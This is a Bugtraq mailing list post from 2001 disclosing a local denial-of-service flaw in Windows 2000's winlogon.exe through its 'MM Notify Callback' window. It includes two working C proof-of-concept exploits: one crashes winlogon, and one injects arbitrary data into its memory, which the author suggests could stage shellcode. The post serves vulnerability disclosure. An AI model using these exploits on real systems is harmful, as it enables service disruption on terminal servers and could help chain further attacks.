Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

More on Winlogon's "windows"

From: Рягин Михаил Юрьевич <ryagin () EXTRIM RU>
Date: Fri, 16 Feb 2001 14:08:50 +0500
Quick info:
Type        : Local DoS
OS          : Windows 2000 (all variants) and probably Windows NT
Risk factor : Low


As well as recent "NetDDE Agent" window hosted by winlogon.exe, there is one another window:
"MM Notify Callback". It is hosted by winmm.dll which is loaded into winlogon.exe.

Windows procedure seems to handle few messages, WM_CREATE, WM_DESTROY, WM_CLOSE, WM_TIMER,
and, the most interesting, WM_DEVICECHANGE.

The primary role of WM_DEVICECHANGE message is informing the user-space environment about device plug/unplug  and 
related issues.

The "MM Notify Callback" window analyses only "MM Notify Callback"
DBT_DEVICEARRIVAL [0x8000] and
DBT_DEVICEREMOVECOMPLETE [0x8004] sub-messages (arriving from wParam).

When it gots this messages, it reads data structure, interpreting lParam as pointer.
Data structure must have value 0x00000005 at offset+0x4 and
must have special GUID value at offset+0xC,
and must have null-terminated uncode string ot offset+0x1C

This issue most probably cannot serve for executing code with SYSTEM priveleges,
but this requires more accurate research. Quick look at winmm.dll code  shows that supplied
structure doesn't used in copy operations into random memory addresses, however, you can
fill region of winlogon's memory with practically any user-suppied data (the only prohibited
value is unicode 0x0000 string terminator).

This can be used as shellcode for another winlogon's bug, for example.

Nevertheless, by running exploit from the bottom of message, you can crash winlogon.exe with access violation.

Thus have little value for ordinary Workstations and Servers, but can be used to DoS against Terminal Servers.

Exploit 1: crashes winlogon with access violation
Exploit 2: inject data string of 'ABCD' x 0x1000 (in unicode) into winlogon memory space

----- exploit 1-------
#include <windows.h>
#include <stdio.h>

DWORD exploit[]={0x11223344,0x5, 0x55667788,
  0x6994AD04,0x11D093EF,0xA000CCA3,0x963122C9
};

int main()
{
  HWND hwnd=FindWindow("MM Notify Callback","MM Notify Callback");
  printf("Window=%x\n",hwnd);
  SendMessage(hwnd, WM_DEVICECHANGE, 0x8000,0x00000000);
  //                                                      ^^^^^^^^^^ AV address
  return 0;
}

----- exploit 2-------
#include <windows.h>
#include <stdio.h>

DWORD exploit[]={0x11223344,0x5, 0x55667788,
  0x6994AD04,0x11D093EF,0xA000CCA3,0x963122C9
};

int main()
{
  DWORD *ptr;
  DWORD i,j;
  HWND hwnd=FindWindow("MM Notify Callback","MM Notify Callback");
  printf("Window=%x\n",hwnd);
  ptr = (DWORD*)malloc(0x1000*4+sizeof(exploit));
  for(i=0;i<sizeof(exploit)/sizeof(exploit[0]);i++)
    ptr[i]=exploit[i];

  for(j=0;j<0x1000;j++) ptr[i+j]='ABCD';


  SendMessage(hwnd, WM_DEVICECHANGE, 0x8000,(DWORD)ptr);
  return 0;
}
-------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: